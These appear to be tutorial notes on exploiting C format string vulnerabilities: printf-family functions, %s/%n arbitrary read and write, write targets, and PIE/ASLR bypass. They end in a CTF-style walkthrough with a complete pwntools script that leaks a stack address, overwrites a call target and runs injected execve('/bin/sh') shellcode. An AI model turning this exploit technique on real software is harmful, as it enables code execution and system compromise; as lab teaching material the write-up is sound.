1. Vulnerable functions

int printf(const char *format, ...) : writes formatted output to standard output (stdout)
int fprintf(FILE *stream, const char *format, ...) : writes formatted output to the given file stream
int sprintf(char *str, const char *format, ...) : writes formatted output to a string buffer
int snprintf(char *str, size_t size, const char *format, ...) : writes formatted output to a string buffer, limiting the number of characters written
void syslog(int priority, const char *format, ...);
int vprintf(const char *restrict format, va_list ap);
int scanf(const char *restrict format, ...);
int sscanf(const char *restrict str, const char *restrict format, ...);

2. Format string conversion specifiers

%p - take the argument as a pointer and print it
%s - take the argument as a pointer, dereference it, and print the chars it points to
%x - take the argument as an integer and print it in hexadecimal
%n - store the number of characters written so far into the int (4 bytes) pointed to by the corresponding argument
- %n prints nothing itself; it writes the count of characters output so far to the memory address its argument points to.
- The argument must be a pointer to an int variable, which receives the count.

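3. Arguments

On x86-64 (System V calling convention) the first six integer arguments are passed in registers: rdi, rsi, rdx, rcx, r8, r9. For printf, rdi holds the format string, so %1$p to %5$p read rsi, rdx, rcx, r8 and r9.
From the seventh argument on, arguments are passed on the stack.
%6$p : prints the 8 bytes at [rsp], i.e. the first value on the stack
%9$p : prints the fourth value on the stack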
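The mapping from a positional specifier to the place printf reads from can be sketched as a small lookup. This is only an illustration under the assumptions above (x86-64 System V, integer or pointer arguments, rsp taken at the moment printf is called); `positional_source` is a made-up helper name, not part of any library.

```python
# Hypothetical helper: where printf fetches its n-th positional argument
# (x86-64 System V ABI, integer/pointer arguments only).
ARG_REGISTERS = ["rsi", "rdx", "rcx", "r8", "r9"]  # rdi holds the format string


def positional_source(n: int) -> str:
    """Return the register or stack slot read by %n$p inside printf."""
    if n < 1:
        raise ValueError("positional arguments are numbered from 1")
    if n <= len(ARG_REGISTERS):
        return ARG_REGISTERS[n - 1]
    offset = (n - 6) * 8  # %6$p is the first stack slot
    return "[rsp]" if offset == 0 else f"[rsp+{offset:#x}]"


for n in (1, 5, 6, 9):
    print(f"%{n}$p -> {positional_source(n)}")
```

The loop prints one line per index, which makes it easy to check that index 6 is the first stack slot and index 9 the fourth.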

4. Stack picture

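How does printf know the number of arguments?
It does not: it fetches one argument for each conversion specifier in the format string, whether or not the caller actually passed one.
stack
Stack-passed arguments are pushed before the return address, so inside the callee they sit above it: [rbp] holds the saved rbp, [rbp+8] the return address, and the arguments are at rbp+16, rbp+24, and so on.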

5. Arbitrary read

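deduction
- %s interprets 0x4141414141414141 as a pointer to a string and tries to dereference it, printing the bytes at that address until it reaches a \0 (null terminator).
- If we replace AAAAAAAA with an address and the matching %p with %s, we can in theory print whatever that address points to.
payload : '\x12\x34\x56\x78\x00\x00\x00\x00 %s'
- This payload does not work: printf stops processing the format string at the first '\x00', so the '%s' is never reached.
- So the address and the "%s" have to swap places.
switch the position of address and "%s"
payload: %p%p%p%p%p%p%p%sAAAABBBB - it should work!
- Replacing AAAABBBB with an address makes the %s print the content stored at that address.
- Because the two parts are swapped, the format string now comes first on the stack and the address follows it, so padding has to be taken into account; in this case it costs one extra %p.
"%{n}$p" payload
- Prints the n-th argument directly. In this example %6$p prints printf's seventh argument (counting the format string itself as the first), which is the first value on the stack, i.e. the 8 bytes at [rsp].
padding
- Stack slots are 8 bytes wide, so the format part must be padded to a multiple of 8 bytes for the address to occupy a slot of its own.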
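The reasoning above can be sketched in a few lines: one helper shows what printf sees of a payload (everything before the first null byte), the other builds a read payload with the format part first, padded to 8 bytes, and the address after it. The helper names and the use of "." as padding are assumptions for illustration; n is the index found with "AAAABBBB %{n}$p".

```python
import struct


def c_string_view(payload: bytes) -> bytes:
    """What printf parses as the format: bytes up to the first NUL."""
    return payload.split(b"\x00", 1)[0]


def read_payload(n: int, address: int) -> bytes:
    """Format part first (padded to one 8-byte slot), then the address.

    The buffer starts at positional index n, so the address, one slot
    later, is reached with index n + 1.
    """
    fmt = f"%{n + 1}$s".encode()
    if len(fmt) > 8:
        raise ValueError("format part does not fit in one 8-byte slot")
    return fmt.ljust(8, b".") + struct.pack("<Q", address)


# Address first: the NUL bytes of the address hide the %s from printf.
broken = struct.pack("<Q", 0x78563412) + b" %s"
print(c_string_view(broken))

# Format first: the %s is parsed before any NUL byte is reached.
working = read_payload(6, 0x78563412)
print(c_string_view(working))
```

The first print shows only the four non-zero address bytes, the second shows the specifier, the padding and the same four bytes.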

6. Arbitrary write & arbitrary bytes

arbitrary write
- %n + address
  Writes the number of characters output so far to the memory the address points to; %n writes 4 bytes.
arbitrary bytes
- %hhn: write one byte
- %hn: write two bytes
- %lln: write eight bytes
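A small model of these variants, assuming a little-endian x86-64 Linux target and counts small enough not to overflow printf's own counter: each specifier stores the character count truncated to its own width. `stored_bytes` is a hypothetical name used only for this sketch.

```python
# Bytes written by each %n variant (x86-64 Linux assumed).
WRITE_SIZES = {"%hhn": 1, "%hn": 2, "%n": 4, "%lln": 8}


def stored_bytes(specifier: str, count: int) -> bytes:
    """Bytes that end up in memory when `count` characters were printed."""
    size = WRITE_SIZES[specifier]
    value = count % (1 << (8 * size))  # the count is truncated to the width
    return value.to_bytes(size, "little")


for spec in WRITE_SIZES:
    print(spec, stored_bytes(spec, 0x141).hex())
```

With a count of 0x141, %hhn keeps only the low byte 0x41, which is the wrap-around that chained byte writes rely on.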
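control what we are writing
- payload : AA……AAAAA %n \x78\x45\x34\x12
  Problem 1: if the value to write is large, the payload becomes very long, and the program may not read a payload of that length.
- Fix 1 : %{n}c : sets the total field width to n and pads on the left with spaces, so exactly n characters are printed.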
```
printf("%50c", 'A');
```
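  %50c: prints one character preceded by 49 spaces (total width 50)
  Problem 2 : if the value to write is very large, n in %{n}c must be very large too; printing that many padding characters is slow and, depending on the machine, the exploit may stall or crash.
- Fix 2 : Chaining together multiple small writes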
  - payload
  - overflows
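The arithmetic behind chained %hhn writes can be sketched as follows. Each write stores only the low byte of the running count, so a target byte smaller than the current count is reached by printing until the count wraps past 256. The function name `hhn_widths` and the sample value are made up for the example.

```python
def hhn_widths(value: int, size: int = 8, already_printed: int = 0) -> list:
    """Extra characters to print before each successive %hhn write.

    Bytes are written lowest address first (little-endian). A width of 0
    means the %{n}c directive must be left out entirely, because "%0c"
    would still print one character.
    """
    widths = []
    count = already_printed
    for byte in value.to_bytes(size, "little"):
        pad = (byte - count) % 256  # wrap around when byte < count
        widths.append(pad)
        count += pad
    return widths


# Made-up 6-byte stack address, written one byte at a time.
print(hhn_widths(0x7FFD1234ABCD, size=6))
```

At most 255 padding characters are printed per byte, instead of one enormous %{n}c for the whole value.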

7. Where can I write

PLT / GOT
Function ptrs, jump tables
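libc hooks (__malloc_hook, __free_hook, etc.)
dtors : destructors run at program exit to clean up global resources or perform exit actions
__atexit handlers : cleanup functions registered to run when the program exits
vtable : the virtual function table used to implement polymorphism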

8. Protections

Stop you corrupting memory
- Stack canary
- …
Stop you gaining code exec after memory corruption
- ASLR/PIE Randomisation
- NX
- …
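bypass
- pwn checksec <binary_name> : list which protections the binary has
- ASLR : system-level address randomization (the stack, heap, etc. are each shifted as a whole)
  - bypass : leak an address
- PIE : binary-level address randomization (main, global variables, etc. are shifted as a whole)
  - bypass : leak an address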
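Because each region is shifted as a whole, one leaked address is enough to recover its base: subtract the known offset of the leaked item. The sketch below uses made-up numbers and a hypothetical helper name; the page-alignment check is only a sanity test on the result.

```python
PAGE_MASK = 0xFFF  # mapping bases are page aligned (4 KiB pages assumed)


def base_from_leak(leaked: int, known_offset: int) -> int:
    """Recover a randomized base from one leaked address."""
    base = leaked - known_offset
    if base & PAGE_MASK:
        raise ValueError("base is not page aligned: wrong offset or wrong leak")
    return base


leaked_main = 0x55D0C3A01189  # made-up runtime address of main
main_offset = 0x1189          # made-up offset of main inside the binary
pie_base = base_from_leak(leaked_main, main_offset)
print(hex(pie_base))

# Any other symbol is then base + its offset in the file.
some_global_offset = 0x4010   # made-up offset of a global variable
print(hex(pie_base + some_global_offset))
```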

9. Exploitation

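Find where the input sits on the stack
- AAAABBBB %{n}$p
Swap the payload fields, use n+1, and add padding
- %{n+1}$p....AAAABBBB
  If {n+1} has 1 digit, use 4 dots.
  If {n+1} has 2 digits, use 3 dots.
  And so on, so that the format part is always 8 bytes long.
arbitrary read
- %{n+1}$s.... <address to read>
arbitrary write
- Split the value to write into an array of bytes
- Write each byte to the target address in turn
  - %{x}c%{n+int(padding/8)}$lln%{y}c%{n+1+int(padding/8)}$hhn<addr1><addr1+1>…
- Print, as a string, the data that the pointer stored at the target address points to
  - %{n+int(padding_total_bytes/8)}$s
format_exploit_generator.py:
The function def fmt_address_write_payload(hex_written_address, arg_number_i, padding_total_bytes, written_address_location) implements this.
- hex_written_address : the address value to be written
- arg_number_i : the value of n in "AAAABBBB %{n}$p"
- padding_total_bytes : the padding size
- written_address_location : the location being written to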
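The source of format_exploit_generator.py is not shown here, so the following is only a guess at the general shape of such a generator, not the author's implementation. It assumes the format part occupies a fixed area of padding_total_bytes bytes at the start of the buffer, that the target addresses follow directly after it, and that every byte is written with %hhn. `sketch_write_payload` and its `size` parameter are hypothetical.

```python
import struct


def sketch_write_payload(value: int, n: int, padding_total_bytes: int,
                         target: int, size: int = 8) -> bytes:
    """Write `value` (size bytes) to `target`, one %hhn per byte."""
    if padding_total_bytes % 8:
        raise ValueError("format area must be a multiple of 8 bytes")
    # The buffer starts at index n; addresses start after the format area.
    first_addr_index = n + padding_total_bytes // 8
    fmt = b""
    count = 0
    for i, byte in enumerate(value.to_bytes(size, "little")):
        pad = (byte - count) % 256
        if pad:  # "%0c" would still print one character, so skip it
            fmt += f"%{pad}c".encode()
            count += pad
        fmt += f"%{first_addr_index + i}$hhn".encode()
    if len(fmt) > padding_total_bytes:
        raise ValueError("format part does not fit in the reserved area")
    fmt = fmt.ljust(padding_total_bytes, b".")  # dots are printed after all writes
    addrs = b"".join(struct.pack("<Q", target + i) for i in range(size))
    return fmt + addrs


payload = sketch_write_payload(0x4142, n=8, padding_total_bytes=32,
                               target=0x1000, size=2)
print(payload)
```

Placing the addresses after the format area keeps their null bytes behind every specifier, so printf parses the whole format before the string ends.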

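10. Worked example

1. The challenge used here is spooky, which involves PIE, fmt_vuln, and shellcode. First look at the call chain, main() -> loop(), and at the key function loop(). As the figure shows, loop() contains no ret instruction, only a single call instruction. The only way to change the program's execution path is through that call, and one approach is to make the call target point to the shellcode. [Figure: spooky_overview]

2. The binary has PIE enabled, so the PIE protection has to be bypassed. [Figure: spooky_checksec]

3. There is a format string vulnerability. The input buffer is at rbp-0x110. [Figure: spooky_checksec]

4. Approach:

Bypass PIE: since the call chain is main() -> loop(), the format string vulnerability can be used to print the address held in main's rbp (rbp_main). "%6$p" prints the first value on loop()'s stack; loop()'s stack frame is 0x120 bytes, and the slot right after it holds rbp_main, so "%{6+int(0x120/8)}$p" prints rbp_main, from which any stack address can be derived.
Storing the shellcode: the binary contains no shellcode, so we have to supply it as input. We can place it at the bottom of input_buffer: shellcode_location = rbp - 0x45
Calling the shellcode
- The binary has only one call instruction that can invoke a function, and it calls the value stored at [rbp-0x110], so the shellcode address has to be stored at [rbp-0x110].
- How do we get the shellcode address into [rbp-0x110]? The format string vulnerability gives an arbitrary write. So we only need to put fmt_payload + filler bytes + shellcode into the input buffer: when the format string vulnerability is triggered, the shellcode address is written to [rbp-0x110] and the shellcode itself is already in memory; the call instruction then jumps to the shellcode and gives us a shell.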
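The offsets in this plan can be checked with a little arithmetic before anything is sent. The sketch below assumes a format payload of 192 bytes (a 128-byte format area plus eight 8-byte addresses, which is a guess at what the generator produces) and the 37-byte shellcode used in the exploit; the constant and function names are hypothetical.

```python
FRAME_SIZE = 0x120       # size of loop()'s stack frame
BUFFER_START = 0x110     # input buffer begins at rbp - 0x110
SHELLCODE_START = 0x45   # shellcode begins at rbp - 0x45

# Positional index of the saved rbp of main: first stack slot is index 6.
leak_index = 6 + FRAME_SIZE // 8
print(f"%{leak_index}$p")


def layout(fmt_len: int, shellcode_len: int):
    """Return (shellcode offset in buffer, filler length, end offset)."""
    shellcode_offset = BUFFER_START - SHELLCODE_START
    filler = shellcode_offset - fmt_len
    if filler < 0:
        raise ValueError("format payload overlaps the shellcode")
    end = shellcode_offset + shellcode_len
    if end > BUFFER_START:
        raise ValueError("shellcode runs past the saved rbp")
    return shellcode_offset, filler, end


print(layout(fmt_len=128 + 8 * 8, shellcode_len=37))
```

If the real format payload is longer or shorter than assumed, only the filler length changes, as long as it stays non-negative.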

5. Exploitation:

from pwn import *
from format_exploit_generator import *

context.endian = 'little'
context.arch = 'amd64'

'''
1. Leak rbp_main and calculate the printed address location, because the salutations function
executes the address stored there.
2. In the input function and print function:
fmt_payload : overwrite the printed address location with the shellcode address.
exp_payload = fmt_payload + padding + shellcode
3. Run the salutations function to execute the shellcode
'''


'''
fmt_vuln entry point: 8: AAAABBBB 0x4242424241414141
'''
# outputs = []
# for i in range(1, 100):
#     p = process('./spooky')
#     p.sendlineafter(b"$ ", b"i")
#     payload = f"AAAABBBB %{i}$p".encode()
#     p.sendline(payload)
#     p.sendlineafter(b"$ ", b"p")
#     fuzz_message = p.recvuntil(b'\n', drop=True).decode('utf-8')
#     outputs.append(f"{i}: {fuzz_message}")
#     p.close()
# for output in outputs:
#     print(output)

# p.sendlineafter(b"$ ", b"i")
# p.sendline(b"AAAABBBB %6$p")
# p.sendlineafter(b"$ ", b"p")






p = process("./spooky")


#shellcode: pop a shell
shellcode = asm('''

mov rax, 0x0068732F6E69622F /* "/bin/sh" plus a NUL terminator, little-endian */
push rax

mov rdi, rsp

mov rsi, 0
mov rdx, 0

mov rax, 0x3b
syscall

''')
#shellcode_len : 37
print("shellcode_len: ",len(shellcode))



'''
leak rbp_main address
Calculate rbp_loop, printed address location and shellcode_location
'''
p.sendlineafter(b"$ ", b"i")
payload = f"%{6 + 0x120 // 8}$p".encode()  # index of the saved rbp of main
p.sendline(payload)
p.sendlineafter(b"$ ", b"p")
rbp_main = int(p.recvuntil(b'\n', drop=True).decode('utf-8'), 16)
print("rbp_main: ", hex(rbp_main))

rbp_loop = rbp_main - 0x10
printed_address_location = rbp_loop - 0x118
shellcode_location = rbp_loop - 0x45


'''
Generate fmt_payload and exp_payload
fmt_payload: write shellcode_location into printed_address_location
exp_payload: fmt_payload + NOP filler + shellcode
'''
p.sendlineafter(b"$ ", b"i")
fmt_payload = fmt_address_write_payload(shellcode_location, 8, 128, printed_address_location)
exp_payload = fmt_payload + b'\x90' * (0x110-0x45-len(fmt_payload)) + shellcode
p.sendline(exp_payload)
p.sendlineafter(b"$ ", b"p")

'''
Run the salutations function, which calls the shellcode and pops a shell
'''
p.sendlineafter(b"$ ", b"s")



p.interactive()
p.close()